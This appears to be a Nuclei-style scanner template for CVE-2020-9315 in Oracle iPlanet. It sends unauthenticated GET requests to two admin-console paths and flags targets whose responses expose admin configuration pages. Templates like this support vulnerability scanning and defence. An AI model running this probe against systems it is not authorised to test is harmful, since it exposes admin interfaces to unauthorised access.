id: CVE-2020-9315

info:
  name: Oracle iPlanet Improper Authorization
  author: dhiyaneshDk
  severity: high
  reference: https://www.cvebase.com/cve/2020/9315
  tags: cve,cve2020,oracle

requests:
  - method: GET
    path:
      - "{{BaseURL}}/admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2"
      - "{{BaseURL}}/admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4"
    headers:
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Admin Console"

      - type: word
        words:
          - "serverConfigurationsGeneral"
          - "serverCertificatesGeneral"
        condition: or

      - type: status
        status:
          - 200